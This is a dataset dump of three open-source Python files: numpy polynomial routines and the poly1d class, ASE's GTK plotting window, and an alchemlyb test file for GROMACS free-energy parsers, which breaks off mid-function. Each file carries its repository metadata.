The fourth-order derivative of a 3rd-order polynomial is zero:
>>> np.polyder(p, 2)
poly1d([6, 2])
>>> np.polyder(p, 3)
poly1d([6])
>>> np.polyder(p, 4)
poly1d([0.])
"""
m = int(m)
if m < 0:
raise ValueError("Order of derivative must be positive (see polyint)")
truepoly = isinstance(p, poly1d)
p = NX.asarray(p)
n = len(p) - 1
y = p[:-1] * NX.arange(n, 0, -1)
if m == 0:
val = p
else:
val = polyder(y, m - 1)
if truepoly:
val = poly1d(val)
return val
def _polyfit_dispatcher(x, y, deg, rcond=None, full=None, w=None, cov=None):
return (x, y, w)
@array_function_dispatch(_polyfit_dispatcher)
def polyfit(x, y, deg, rcond=None, full=False, w=None, cov=False):
"""
Least squares polynomial fit.
Fit a polynomial ``p(x) = p[0] * x**deg + ... + p[deg]`` of degree `deg`
to points `(x, y)`. Returns a vector of coefficients `p` that minimises
the squared error in the order `deg`, `deg-1`, ... `0`.
The `Polynomial.fit <numpy.polynomial.polynomial.Polynomial.fit>` class
method is recommended for new code as it is more stable numerically. See
the documentation of the method for more information.
Parameters
----------
x : array_like, shape (M,)
x-coordinates of the M sample points ``(x[i], y[i])``.
y : array_like, shape (M,) or (M, K)
y-coordinates of the sample points. Several data sets of sample
points sharing the same x-coordinates can be fitted at once by
passing in a 2D-array that contains one dataset per column.
deg : int
Degree of the fitting polynomial
rcond : float, optional
Relative condition number of the fit. Singular values smaller than
this relative to the largest singular value will be ignored. The
default value is len(x)*eps, where eps is the relative precision of
the float type, about 2e-16 in most cases.
full : bool, optional
Switch determining nature of return value. When it is False (the
default) just the coefficients are returned, when True diagnostic
information from the singular value decomposition is also returned.
w : array_like, shape (M,), optional
Weights to apply to the y-coordinates of the sample points. For
gaussian uncertainties, use 1/sigma (not 1/sigma**2).
cov : bool or str, optional
If given and not `False`, return not just the estimate but also its
covariance matrix. By default, the covariance are scaled by
chi2/sqrt(N-dof), i.e., the weights are presumed to be unreliable
except in a relative sense and everything is scaled such that the
reduced chi2 is unity. This scaling is omitted if ``cov='unscaled'``,
as is relevant for the case that the weights are 1/sigma**2, with
sigma known to be a reliable estimate of the uncertainty.
Returns
-------
p : ndarray, shape (deg + 1,) or (deg + 1, K)
Polynomial coefficients, highest power first. If `y` was 2-D, the
coefficients for `k`-th data set are in ``p[:,k]``.
residuals, rank, singular_values, rcond
Present only if `full` = True. Residuals is sum of squared residuals
of the least-squares fit, the effective rank of the scaled Vandermonde
coefficient matrix, its singular values, and the specified value of
`rcond`. For more details, see `linalg.lstsq`.
V : ndarray, shape (M,M) or (M,M,K)
Present only if `full` = False and `cov`=True. The covariance
matrix of the polynomial coefficient estimates. The diagonal of
this matrix are the variance estimates for each coefficient. If y
is a 2-D array, then the covariance matrix for the `k`-th data set
are in ``V[:,:,k]``
Warns
-----
RankWarning
The rank of the coefficient matrix in the least-squares fit is
deficient. The warning is only raised if `full` = False.
The warnings can be turned off by
>>> import warnings
>>> warnings.simplefilter('ignore', np.RankWarning)
See Also
--------
polyval : Compute polynomial values.
linalg.lstsq : Computes a least-squares fit.
scipy.interpolate.UnivariateSpline : Computes spline fits.
Notes
-----
The solution minimizes the squared error
.. math ::
E = \\sum_{j=0}^k |p(x_j) - y_j|^2
in the equations::
x[0]**n * p[0] + ... + x[0] * p[n-1] + p[n] = y[0]
x[1]**n * p[0] + ... + x[1] * p[n-1] + p[n] = y[1]
...
x[k]**n * p[0] + ... + x[k] * p[n-1] + p[n] = y[k]
The coefficient matrix of the coefficients `p` is a Vandermonde matrix.
`polyfit` issues a `RankWarning` when the least-squares fit is badly
conditioned. This implies that the best fit is not well-defined due
to numerical error. The results may be improved by lowering the polynomial
degree or by replacing `x` by `x` - `x`.mean(). The `rcond` parameter
can also be set to a value smaller than its default, but the resulting
fit may be spurious: including contributions from the small singular
values can add numerical noise to the result.
Note that fitting polynomial coefficients is inherently badly conditioned
when the degree of the polynomial is large or the interval of sample points
is badly centered. The quality of the fit should always be checked in these
cases. When polynomial fits are not satisfactory, splines may be a good
alternative.
References
----------
.. [1] Wikipedia, "Curve fitting",
https://en.wikipedia.org/wiki/Curve_fitting
.. [2] Wikipedia, "Polynomial interpolation",
https://en.wikipedia.org/wiki/Polynomial_interpolation
Examples
--------
>>> import warnings
>>> x = np.array([0.0, 1.0, 2.0, 3.0, 4.0, 5.0])
>>> y = np.array([0.0, 0.8, 0.9, 0.1, -0.8, -1.0])
>>> z = np.polyfit(x, y, 3)
>>> z
array([ 0.08703704, -0.81349206, 1.69312169, -0.03968254]) # may vary
It is convenient to use `poly1d` objects for dealing with polynomials:
>>> p = np.poly1d(z)
>>> p(0.5)
0.6143849206349179 # may vary
>>> p(3.5)
-0.34732142857143039 # may vary
>>> p(10)
22.579365079365115 # may vary
High-order polynomials may oscillate wildly:
>>> with warnings.catch_warnings():
... warnings.simplefilter('ignore', np.RankWarning)
... p30 = np.poly1d(np.polyfit(x, y, 30))
...
>>> p30(4)
-0.80000000000000204 # may vary
>>> p30(5)
-0.99999999999999445 # may vary
>>> p30(4.5)
-0.10547061179440398 # may vary
Illustration:
>>> import matplotlib.pyplot as plt
>>> xp = np.linspace(-2, 6, 100)
>>> _ = plt.plot(x, y, '.', xp, p(xp), '-', xp, p30(xp), '--')
>>> plt.ylim(-2,2)
(-2, 2)
>>> plt.show()
"""
order = int(deg) + 1
x = NX.asarray(x) + 0.0
y = NX.asarray(y) + 0.0
# check arguments.
if deg < 0:
raise ValueError("expected deg >= 0")
if x.ndim != 1:
raise TypeError("expected 1D vector for x")
if x.size == 0:
raise TypeError("expected non-empty vector for x")
if y.ndim < 1 or y.ndim > 2:
raise TypeError("expected 1D or 2D array for y")
if x.shape[0] != y.shape[0]:
raise TypeError("expected x and y to have same length")
# set rcond
if rcond is None:
rcond = len(x)*finfo(x.dtype).eps
# set up least squares equation for powers of x
lhs = vander(x, order)
rhs = y
# apply weighting
if w is not None:
w = NX.asarray(w) + 0.0
if w.ndim != 1:
raise TypeError("expected a 1-d array for weights")
if w.shape[0] != y.shape[0]:
raise TypeError("expected w and y to have the same length")
lhs *= w[:, NX.newaxis]
if rhs.ndim == 2:
rhs *= w[:, NX.newaxis]
else:
rhs *= w
# scale lhs to improve condition number and solve
scale = NX.sqrt((lhs*lhs).sum(axis=0))
lhs /= scale
c, resids, rank, s = lstsq(lhs, rhs, rcond)
c = (c.T/scale).T # broadcast scale coefficients
# warn on rank reduction, which indicates an ill conditioned matrix
if rank != order and not full:
msg = "Polyfit may be poorly conditioned"
warnings.warn(msg, RankWarning, stacklevel=4)
if full:
return c, resids, rank, s, rcond
elif cov:
Vbase = inv(dot(lhs.T, lhs))
Vbase /= NX.outer(scale, scale)
if cov == "unscaled":
fac = 1
else:
if len(x) <= order:
raise ValueError("the number of data points must exceed order "
"to scale the covariance matrix")
# note, this used to be: fac = resids / (len(x) - order - 2.0)
# it was deciced that the "- 2" (originally justified by "Bayesian
# uncertainty analysis") is not was the user expects
# (see gh-11196 and gh-11197)
fac = resids / (len(x) - order)
if y.ndim == 1:
return c, Vbase * fac
else:
return c, Vbase[:,:, NX.newaxis] * fac
else:
return c
def _polyval_dispatcher(p, x):
return (p, x)
@array_function_dispatch(_polyval_dispatcher)
def polyval(p, x):
"""
Evaluate a polynomial at specific values.
If `p` is of length N, this function returns the value:
``p[0]*x**(N-1) + p[1]*x**(N-2) + ... + p[N-2]*x + p[N-1]``
If `x` is a sequence, then `p(x)` is returned for each element of `x`.
If `x` is another polynomial then the composite polynomial `p(x(t))`
is returned.
Parameters
----------
p : array_like or poly1d object
1D array of polynomial coefficients (including coefficients equal
to zero) from highest degree to the constant term, or an
instance of poly1d.
x : array_like or poly1d object
A number, an array of numbers, or an instance of poly1d, at
which to evaluate `p`.
Returns
-------
values : ndarray or poly1d
If `x` is a poly1d instance, the result is the composition of the two
polynomials, i.e., `x` is "substituted" in `p` and the simplified
result is returned. In addition, the type of `x` - array_like or
poly1d - governs the type of the output: `x` array_like => `values`
array_like, `x` a poly1d object => `values` is also.
See Also
--------
poly1d: A polynomial class.
Notes
-----
Horner's scheme [1]_ is used to evaluate the polynomial. Even so,
for polynomials of high degree the values may be inaccurate due to
rounding errors. Use carefully.
If `x` is a subtype of `ndarray` the return value will be of the same type.
References
----------
.. [1] I. N. Bronshtein, K. A. Semendyayev, and K. A. Hirsch (Eng.
trans. Ed.), *Handbook of Mathematics*, New York, Van Nostrand
Reinhold Co., 1985, pg. 720.
Examples
--------
>>> np.polyval([3,0,1], 5) # 3 * 5**2 + 0 * 5**1 + 1
76
>>> np.polyval([3,0,1], np.poly1d(5))
poly1d([76.])
>>> np.polyval(np.poly1d([3,0,1]), 5)
76
>>> np.polyval(np.poly1d([3,0,1]), np.poly1d(5))
poly1d([76.])
"""
p = NX.asarray(p)
if isinstance(x, poly1d):
y = 0
else:
x = NX.asanyarray(x)
y = NX.zeros_like(x)
for i in range(len(p)):
y = y * x + p[i]
return y
def _binary_op_dispatcher(a1, a2):
return (a1, a2)
@array_function_dispatch(_binary_op_dispatcher)
def polyadd(a1, a2):
"""
Find the sum of two polynomials.
Returns the polynomial resulting from the sum of two input polynomials.
Each input must be either a poly1d object or a 1D sequence of polynomial
coefficients, from highest to lowest degree.
Parameters
----------
a1, a2 : array_like or poly1d object
Input polynomials.
Returns
-------
out : ndarray or poly1d object
The sum of the inputs. If either input is a poly1d object, then the
output is also a poly1d object. Otherwise, it is a 1D array of
polynomial coefficients from highest to lowest degree.
See Also
--------
poly1d : A one-dimensional polynomial class.
poly, polyadd, polyder, polydiv, polyfit, polyint, polysub, polyval
Examples
--------
>>> np.polyadd([1, 2], [9, 5, 4])
array([9, 6, 6])
Using poly1d objects:
>>> p1 = np.poly1d([1, 2])
>>> p2 = np.poly1d([9, 5, 4])
>>> print(p1)
1 x + 2
>>> print(p2)
2
9 x + 5 x + 4
>>> print(np.polyadd(p1, p2))
2
9 x + 6 x + 6
"""
truepoly = (isinstance(a1, poly1d) or isinstance(a2, poly1d))
a1 = atleast_1d(a1)
a2 = atleast_1d(a2)
diff = len(a2) - len(a1)
if diff == 0:
val = a1 + a2
elif diff > 0:
zr = NX.zeros(diff, a1.dtype)
val = NX.concatenate((zr, a1)) + a2
else:
zr = NX.zeros(abs(diff), a2.dtype)
val = a1 + NX.concatenate((zr, a2))
if truepoly:
val = poly1d(val)
return val
@array_function_dispatch(_binary_op_dispatcher)
def polysub(a1, a2):
"""
Difference (subtraction) of two polynomials.
Given two polynomials `a1` and `a2`, returns ``a1 - a2``.
`a1` and `a2` can be either array_like sequences of the polynomials'
coefficients (including coefficients equal to zero), or `poly1d` objects.
Parameters
----------
a1, a2 : array_like or poly1d
Minuend and subtrahend polynomials, respectively.
Returns
-------
out : ndarray or poly1d
Array or `poly1d` object of the difference polynomial's coefficients.
See Also
--------
polyval, polydiv, polymul, polyadd
Examples
--------
.. math:: (2 x^2 + 10 x - 2) - (3 x^2 + 10 x -4) = (-x^2 + 2)
>>> np.polysub([2, 10, -2], [3, 10, -4])
array([-1, 0, 2])
"""
truepoly = (isinstance(a1, poly1d) or isinstance(a2, poly1d))
a1 = atleast_1d(a1)
a2 = atleast_1d(a2)
diff = len(a2) - len(a1)
if diff == 0:
val = a1 - a2
elif diff > 0:
zr = NX.zeros(diff, a1.dtype)
val = NX.concatenate((zr, a1)) - a2
else:
zr = NX.zeros(abs(diff), a2.dtype)
val = a1 - NX.concatenate((zr, a2))
if truepoly:
val = poly1d(val)
return val
@array_function_dispatch(_binary_op_dispatcher)
def polymul(a1, a2):
"""
Find the product of two polynomials.
Finds the polynomial resulting from the multiplication of the two input
polynomials. Each input must be either a poly1d object or a 1D sequence
of polynomial coefficients, from highest to lowest degree.
Parameters
----------
a1, a2 : array_like or poly1d object
Input polynomials.
Returns
-------
out : ndarray or poly1d object
The polynomial resulting from the multiplication of the inputs. If
either inputs is a poly1d object, then the output is also a poly1d
object. Otherwise, it is a 1D array of polynomial coefficients from
highest to lowest degree.
See Also
--------
poly1d : A one-dimensional polynomial class.
poly, polyadd, polyder, polydiv, polyfit, polyint, polysub, polyval
convolve : Array convolution. Same output as polymul, but has parameter
for overlap mode.
Examples
--------
>>> np.polymul([1, 2, 3], [9, 5, 1])
array([ 9, 23, 38, 17, 3])
Using poly1d objects:
>>> p1 = np.poly1d([1, 2, 3])
>>> p2 = np.poly1d([9, 5, 1])
>>> print(p1)
2
1 x + 2 x + 3
>>> print(p2)
2
9 x + 5 x + 1
>>> print(np.polymul(p1, p2))
4 3 2
9 x + 23 x + 38 x + 17 x + 3
"""
truepoly = (isinstance(a1, poly1d) or isinstance(a2, poly1d))
a1, a2 = poly1d(a1), poly1d(a2)
val = NX.convolve(a1, a2)
if truepoly:
val = poly1d(val)
return val
def _polydiv_dispatcher(u, v):
return (u, v)
@array_function_dispatch(_polydiv_dispatcher)
def polydiv(u, v):
"""
Returns the quotient and remainder of polynomial division.
The input arrays are the coefficients (including any coefficients
equal to zero) of the "numerator" (dividend) and "denominator"
(divisor) polynomials, respectively.
Parameters
----------
u : array_like or poly1d
Dividend polynomial's coefficients.
v : array_like or poly1d
Divisor polynomial's coefficients.
Returns
-------
q : ndarray
Coefficients, including those equal to zero, of the quotient.
r : ndarray
Coefficients, including those equal to zero, of the remainder.
See Also
--------
poly, polyadd, polyder, polydiv, polyfit, polyint, polymul, polysub
polyval
Notes
-----
Both `u` and `v` must be 0-d or 1-d (ndim = 0 or 1), but `u.ndim` need
not equal `v.ndim`. In other words, all four possible combinations -
``u.ndim = v.ndim = 0``, ``u.ndim = v.ndim = 1``,
``u.ndim = 1, v.ndim = 0``, and ``u.ndim = 0, v.ndim = 1`` - work.
Examples
--------
.. math:: \\frac{3x^2 + 5x + 2}{2x + 1} = 1.5x + 1.75, remainder 0.25
>>> x = np.array([3.0, 5.0, 2.0])
>>> y = np.array([2.0, 1.0])
>>> np.polydiv(x, y)
(array([1.5 , 1.75]), array([0.25]))
"""
truepoly = (isinstance(u, poly1d) or isinstance(u, poly1d))
u = atleast_1d(u) + 0.0
v = atleast_1d(v) + 0.0
# w has the common type
w = u[0] + v[0]
m = len(u) - 1
n = len(v) - 1
scale = 1. / v[0]
q = NX.zeros((max(m - n + 1, 1),), w.dtype)
r = u.astype(w.dtype)
for k in range(0, m-n+1):
d = scale * r[k]
q[k] = d
r[k:k+n+1] -= d*v
while NX.allclose(r[0], 0, rtol=1e-14) and (r.shape[-1] > 1):
r = r[1:]
if truepoly:
return poly1d(q), poly1d(r)
return q, r
_poly_mat = re.compile(r"[*][*]([0-9]*)")
def _raise_power(astr, wrap=70):
n = 0
line1 = ''
line2 = ''
output = ' '
while True:
mat = _poly_mat.search(astr, n)
if mat is None:
break
span = mat.span()
power = mat.groups()[0]
partstr = astr[n:span[0]]
n = span[1]
toadd2 = partstr + ' '*(len(power)-1)
toadd1 = ' '*(len(partstr)-1) + power
if ((len(line2) + len(toadd2) > wrap) or
(len(line1) + len(toadd1) > wrap)):
output += line1 + "\n" + line2 + "\n "
line1 = toadd1
line2 = toadd2
else:
line2 += partstr + ' '*(len(power)-1)
line1 += ' '*(len(partstr)-1) + power
output += line1 + "\n" + line2
return output + astr[n:]
@set_module('numpy')
class poly1d(object):
"""
A one-dimensional polynomial class.
A convenience class, used to encapsulate "natural" operations on
polynomials so that said operations may take on their customary
form in code (see Examples).
Parameters
----------
c_or_r : array_like
The polynomial's coefficients, in decreasing powers, or if
the value of the second parameter is True, the polynomial's
roots (values where the polynomial evaluates to 0). For example,
``poly1d([1, 2, 3])`` returns an object that represents
:math:`x^2 + 2x + 3`, whereas ``poly1d([1, 2, 3], True)`` returns
one that represents :math:`(x-1)(x-2)(x-3) = x^3 - 6x^2 + 11x -6`.
r : bool, optional
If True, `c_or_r` specifies the polynomial's roots; the default
is False.
variable : str, optional
Changes the variable used when printing `p` from `x` to `variable`
(see Examples).
Examples
--------
Construct the polynomial :math:`x^2 + 2x + 3`:
>>> p = np.poly1d([1, 2, 3])
>>> print(np.poly1d(p))
2
1 x + 2 x + 3
Evaluate the polynomial at :math:`x = 0.5`:
>>> p(0.5)
4.25
Find the roots:
>>> p.r
array([-1.+1.41421356j, -1.-1.41421356j])
>>> p(p.r)
array([ -4.44089210e-16+0.j, -4.44089210e-16+0.j]) # may vary
These numbers in the previous line represent (0, 0) to machine precision
Show the coefficients:
>>> p.c
array([1, 2, 3])
Display the order (the leading zero-coefficients are removed):
>>> p.order
2
Show the coefficient of the k-th power in the polynomial
(which is equivalent to ``p.c[-(i+1)]``):
>>> p[1]
2
Polynomials can be added, subtracted, multiplied, and divided
(returns quotient and remainder):
>>> p * p
poly1d([ 1, 4, 10, 12, 9])
>>> (p**3 + 4) / p
(poly1d([ 1., 4., 10., 12., 9.]), poly1d([4.]))
``asarray(p)`` gives the coefficient array, so polynomials can be
used in all functions that accept arrays:
>>> p**2 # square of polynomial
poly1d([ 1, 4, 10, 12, 9])
>>> np.square(p) # square of individual coefficients
array([1, 4, 9])
The variable used in the string representation of `p` can be modified,
using the `variable` parameter:
>>> p = np.poly1d([1,2,3], variable='z')
>>> print(p)
2
1 z + 2 z + 3
Construct a polynomial from its roots:
>>> np.poly1d([1, 2], True)
poly1d([ 1., -3., 2.])
This is the same polynomial as obtained by:
>>> np.poly1d([1, -1]) * np.poly1d([1, -2])
poly1d([ 1, -3, 2])
"""
__hash__ = None
@property
def coeffs(self):
""" The polynomial coefficients """
return self._coeffs
@coeffs.setter
def coeffs(self, value):
# allowing this makes p.coeffs *= 2 legal
if value is not self._coeffs:
raise AttributeError("Cannot set attribute")
@property
def variable(self):
""" The name of the polynomial variable """
return self._variable
# calculated attributes
@property
def order(self):
""" The order or degree of the polynomial """
return len(self._coeffs) - 1
@property
def roots(self):
""" The roots of the polynomial, where self(x) == 0 """
return roots(self._coeffs)
# our internal _coeffs property need to be backed by __dict__['coeffs'] for
# scipy to work correctly.
@property
def _coeffs(self):
return self.__dict__['coeffs']
@_coeffs.setter
def _coeffs(self, coeffs):
self.__dict__['coeffs'] = coeffs
# alias attributes
r = roots
c = coef = coefficients = coeffs
o = order
def __init__(self, c_or_r, r=False, variable=None):
if isinstance(c_or_r, poly1d):
self._variable = c_or_r._variable
self._coeffs = c_or_r._coeffs
if set(c_or_r.__dict__) - set(self.__dict__):
msg = ("In the future extra properties will not be copied "
"across when constructing one poly1d from another")
warnings.warn(msg, FutureWarning, stacklevel=2)
self.__dict__.update(c_or_r.__dict__)
if variable is not None:
self._variable = variable
return
if r:
c_or_r = poly(c_or_r)
c_or_r = atleast_1d(c_or_r)
if c_or_r.ndim > 1:
raise ValueError("Polynomial must be 1d only.")
c_or_r = trim_zeros(c_or_r, trim='f')
if len(c_or_r) == 0:
c_or_r = NX.array([0.])
self._coeffs = c_or_r
if variable is None:
variable = 'x'
self._variable = variable
def __array__(self, t=None):
if t:
return NX.asarray(self.coeffs, t)
else:
return NX.asarray(self.coeffs)
def __repr__(self):
vals = repr(self.coeffs)
vals = vals[6:-1]
return "poly1d(%s)" % vals
def __len__(self):
return self.order
def __str__(self):
thestr = "0"
var = self.variable
# Remove leading zeros
coeffs = self.coeffs[NX.logical_or.accumulate(self.coeffs != 0)]
N = len(coeffs)-1
def fmt_float(q):
s = '%.4g' % q
if s.endswith('.0000'):
s = s[:-5]
return s
for k in range(len(coeffs)):
if not iscomplex(coeffs[k]):
coefstr = fmt_float(real(coeffs[k]))
elif real(coeffs[k]) == 0:
coefstr = '%sj' % fmt_float(imag(coeffs[k]))
else:
coefstr = '(%s + %sj)' % (fmt_float(real(coeffs[k])),
fmt_float(imag(coeffs[k])))
power = (N-k)
if power == 0:
if coefstr != '0':
newstr = '%s' % (coefstr,)
else:
if k == 0:
newstr = '0'
else:
newstr = ''
elif power == 1:
if coefstr == '0':
newstr = ''
elif coefstr == 'b':
newstr = var
else:
newstr = '%s %s' % (coefstr, var)
else:
if coefstr == '0':
newstr = ''
elif coefstr == 'b':
newstr = '%s**%d' % (var, power,)
else:
newstr = '%s %s**%d' % (coefstr, var, power)
if k > 0:
if newstr != '':
if newstr.startswith('-'):
thestr = "%s - %s" % (thestr, newstr[1:])
else:
thestr = "%s + %s" % (thestr, newstr)
else:
thestr = newstr
return _raise_power(thestr)
def __call__(self, val):
return polyval(self.coeffs, val)
def __neg__(self):
return poly1d(-self.coeffs)
def __pos__(self):
return self
def __mul__(self, other):
if isscalar(other):
return poly1d(self.coeffs * other)
else:
other = poly1d(other)
return poly1d(polymul(self.coeffs, other.coeffs))
def __rmul__(self, other):
if isscalar(other):
return poly1d(other * self.coeffs)
else:
other = poly1d(other)
return poly1d(polymul(self.coeffs, other.coeffs))
def __add__(self, other):
other = poly1d(other)
return poly1d(polyadd(self.coeffs, other.coeffs))
def __radd__(self, other):
other = poly1d(other)
return poly1d(polyadd(self.coeffs, other.coeffs))
def __pow__(self, val):
if not isscalar(val) or int(val) != val or val < 0:
raise ValueError("Power to non-negative integers only.")
res = [1]
for _ in range(val):
res = polymul(self.coeffs, res)
return poly1d(res)
def __sub__(self, other):
other = poly1d(other)
return poly1d(polysub(self.coeffs, other.coeffs))
def __rsub__(self, other):
other = poly1d(other)
return poly1d(polysub(other.coeffs, self.coeffs))
def __div__(self, other):
if isscalar(other):
return poly1d(self.coeffs/other)
else:
other = poly1d(other)
return polydiv(self, other)
__truediv__ = __div__
def __rdiv__(self, other):
if isscalar(other):
return poly1d(other/self.coeffs)
else:
other = poly1d(other)
return polydiv(other, self)
__rtruediv__ = __rdiv__
def __eq__(self, other):
if not isinstance(other, poly1d):
return NotImplemented
if self.coeffs.shape != other.coeffs.shape:
return False
return (self.coeffs == other.coeffs).all()
def __ne__(self, other):
if not isinstance(other, poly1d):
return NotImplemented
return not self.__eq__(other)
def __getitem__(self, val):
ind = self.order - val
if val > self.order:
return 0
if val < 0:
return 0
return self.coeffs[ind]
def __setitem__(self, key, val):
ind = self.order - key
if key < 0:
raise ValueError("Does not support negative powers.")
if key > self.order:
zr = NX.zeros(key-self.order, self.coeffs.dtype)
self._coeffs = NX.concatenate((zr, self.coeffs))
ind = 0
self._coeffs[ind] = val
return
def __iter__(self):
return iter(self.coeffs)
def integ(self, m=1, k=0):
"""
Return an antiderivative (indefinite integral) of this polynomial.
Refer to `polyint` for full documentation.
See Also
--------
polyint : equivalent function
"""
return poly1d(polyint(self.coeffs, m=m, k=k))
def deriv(self, m=1):
"""
Return a derivative of this polynomial.
Refer to `polyder` for full documentation.
See Also
--------
polyder : equivalent function
"""
return poly1d(polyder(self.coeffs, m=m))
# Stuff to do on module import
warnings.simplefilter('always', RankWarning)
|
jorisvandenbossche/numpy
|
numpy/lib/polynomial.py
|
Python
|
bsd-3-clause
| 40,755
|
[
"Gaussian"
] |
bab5a3759f1d02f9050ca47ebe448898922c9214d77bd5e5542972d1a097eef3
|
from math import sqrt
import gtk
from gettext import gettext as _
from ase.gui.widgets import pack, help
graph_help_text = _("""\
Help for plot ...
Symbols:
<c>e</c>:\t\t\t\ttotal energy
<c>epot</c>:\t\t\tpotential energy
<c>ekin</c>:\t\t\tkinetic energy
<c>fmax</c>:\t\t\tmaximum force
<c>fave</c>:\t\t\taverage force
<c>R[n,0-2]</c>:\t\t\tposition of atom number <c>n</c>
<c>d(n<sub>1</sub>,n<sub>2</sub>)</c>:\t\t\tdistance between two atoms <c>n<sub>1</sub></c> and <c>n<sub>2</sub></c>
<c>i</c>:\t\t\t\tcurrent image number
<c>E[i]</c>:\t\t\t\tenergy of image number <c>i</c>
<c>F[n,0-2]</c>:\t\t\tforce on atom number <c>n</c>
<c>V[n,0-2]</c>:\t\t\tvelocity of atom number <c>n</c>
<c>M[n]</c>:\t\t\tmagnetic moment of atom number <c>n</c>
<c>A[0-2,0-2]</c>:\t\tunit-cell basis vectors
<c>s</c>:\t\t\t\tpath length
<c>a(n1,n2,n3)</c>:\t\tangle between atoms <c>n<sub>1</sub></c>, <c>n<sub>2</sub></c> and <c>n<sub>3</sub></c>, centered on <c>n<sub>2</sub></c>
<c>dih(n1,n2,n3,n4)</c>:\tdihedral angle between <c>n<sub>1</sub></c>, <c>n<sub>2</sub></c>, <c>n<sub>3</sub></c> and <c>n<sub>4</sub></c>
<c>T</c>:\t\t\t\ttemperature (K)\
""")
class Graphs(gtk.Window):
def __init__(self, gui):
gtk.Window.__init__(self)
#self.window.set_position(gtk.WIN_POS_CENTER)
#self.window.connect("destroy", lambda w: gtk.main_quit())
#self.window.connect('delete_event', self.exit)
self.set_title('Graphs')
vbox = gtk.VBox()
self.expr = pack(vbox, [gtk.Entry(64),
help(graph_help_text)])[0]
self.expr.connect('activate', self.plot)
completion = gtk.EntryCompletion()
self.liststore = gtk.ListStore(str)
for s in ['fmax', 's, e-E[0]', 'i, d(0,1)']:
self.liststore.append([s])
completion.set_model(self.liststore)
self.expr.set_completion(completion)
completion.set_text_column(0)
button = pack(vbox, [gtk.Button(_('Plot')),
gtk.Label(' x, y1, y2, ...')])[0]
button.connect('clicked', self.plot, 'xy')
button = pack(vbox, [gtk.Button(_('Plot')),
gtk.Label(' y1, y2, ...')])[0]
button.connect('clicked', self.plot, 'y')
save_button = gtk.Button(stock=gtk.STOCK_SAVE)
save_button.connect('clicked',self.save)
clear_button = gtk.Button(_('clear'))
clear_button.connect('clicked', self.clear)
pack(vbox, [save_button,clear_button])
self.add(vbox)
vbox.show()
self.show()
self.gui = gui
def plot(self, button=None, type=None, expr=None):
if expr is None:
expr = self.expr.get_text()
else:
self.expr.set_text(expr)
if expr not in [row[0] for row in self.liststore]:
self.liststore.append([expr])
data = self.gui.images.graph(expr)
import matplotlib
matplotlib.interactive(True)
matplotlib.use('GTKAgg')
#matplotlib.use('GTK', warn=False)# Not avail. in 0.91 (it is in 0.98)
import pylab
pylab.ion()
x = 2.5
self.gui.graphs.append(pylab.figure(figsize=(x * 2.5**0.5, x)))
i = self.gui.frame
m = len(data)
if type is None:
if m == 1:
type = 'y'
else:
type = 'xy'
if type == 'y':
for j in range(m):
pylab.plot(data[j])
pylab.plot([i], [data[j, i]], 'o')
else:
for j in range(1, m):
pylab.plot(data[0], data[j])
pylab.plot([data[0, i]], [data[j, i]], 'o')
pylab.title(expr)
#pylab.show()
python = plot
def save(self, filename):
chooser = gtk.FileChooserDialog(
_('Save data to file ... '), None, gtk.FILE_CHOOSER_ACTION_SAVE,
(gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL,
gtk.STOCK_SAVE, gtk.RESPONSE_OK))
save = chooser.run()
if save == gtk.RESPONSE_OK:
filename = chooser.get_filename()
expr = self.expr.get_text()
data = self.gui.images.graph(expr)
expr = '# '+expr
fd = open(filename,'w')
fd.write("%s \n" % (expr))
for s in range(len(data[0])):
for i in range(len(data)):
val = data[i,s]
fd.write("%12.8e\t" % (val))
fd.write("\n")
fd.close()
chooser.destroy()
def clear(self, button):
import pylab
for graph in self.gui.graphs:
pylab.close(graph)
self.gui.graphs = []
|
grhawk/ASE
|
tools/ase/gui/graphs.py
|
Python
|
gpl-2.0
| 4,750
|
[
"ASE"
] |
64d2d47f53d858cfc08353f2cb04a446d5fc4b9f33afca21f4a680e91a07893f
|
"""Gromacs parser tests.
"""
from alchemlyb.parsing.gmx import extract_dHdl, extract_u_nk
from alchemtest.gmx import load_benzene
from alchemtest.gmx import load_expanded_ensemble_case_1, load_expanded_ensemble_case_2, load_expanded_ensemble_case_3
from alchemtest.gmx import load_water_particle_with_total_energy
from alchemtest.gmx import load_water_particle_with_potential_energy
from alchemtest.gmx import load_water_particle_without_energy
from numpy.testing import assert_almost_equal
def test_dHdl():
"""Test that dHdl has the correct form when extracted from files.
"""
dataset = load_benzene()
for leg in dataset['data']:
for filename in dataset['data'][leg]:
dHdl = extract_dHdl(filename, T=300)
assert dHdl.index.names == ['time', 'fep-lambda']
assert dHdl.shape == (4001, 1)
def test_u_nk():
"""Test that u_nk has the correct form when extracted from files.
"""
dataset = load_benzene()
for leg in dataset['data']:
for filename in dataset['data'][leg]:
u_nk = extract_u_nk(filename, T=300)
assert u_nk.index.names == ['time', 'fep-lambda']
if leg == 'Coulomb':
assert u_nk.shape == (4001, 5)
elif leg == 'VDW':
assert u_nk.shape == (4001, 16)
def test_u_nk_case1():
"""Test that u_nk has the correct form when extracted from expanded ensemble files (case 1).
"""
dataset = load_expanded_ensemble_case_1()
for leg in dataset['data']:
for filename in dataset['data'][leg]:
u_nk = extract_u_nk(filename, T=300)
assert u_nk.index.names == ['time', 'fep-lambda', 'coul-lambda', 'vdw-lambda', 'restraint-lambda']
assert u_nk.shape == (50001, 28)
def test_dHdl_case1():
"""Test that dHdl has the correct form when extracted from expanded ensemble files (case 1).
"""
dataset = load_expanded_ensemble_case_1()
for leg in dataset['data']:
for filename in dataset['data'][leg]:
dHdl = extract_dHdl(filename, T=300)
assert dHdl.index.names == ['time', 'fep-lambda', 'coul-lambda', 'vdw-lambda', 'restraint-lambda']
assert dHdl.shape == (50001, 4)
def test_u_nk_case2():
"""Test that u_nk has the correct form when extracted from expanded ensemble files (case 2).
"""
dataset = load_expanded_ensemble_case_2()
for leg in dataset['data']:
for filename in dataset['data'][leg]:
u_nk = extract_u_nk(filename, T=300)
assert u_nk.index.names == ['time', 'fep-lambda', 'coul-lambda', 'vdw-lambda', 'restraint-lambda']
assert u_nk.shape == (25001, 28)
def test_u_nk_case3():
"""Test that u_nk has the correct form when extracted from REX files (case 3).
"""
dataset = load_expanded_ensemble_case_3()
for leg in dataset['data']:
for filename in dataset['data'][leg]:
u_nk = extract_u_nk(filename, T=300)
assert u_nk.index.names == ['time', 'fep-lambda', 'coul-lambda', 'vdw-lambda', 'restraint-lambda']
assert u_nk.shape == (2500, 28)
def test_dHdl_case3():
"""Test that dHdl has the correct form when extracted from REX files (case 3).
"""
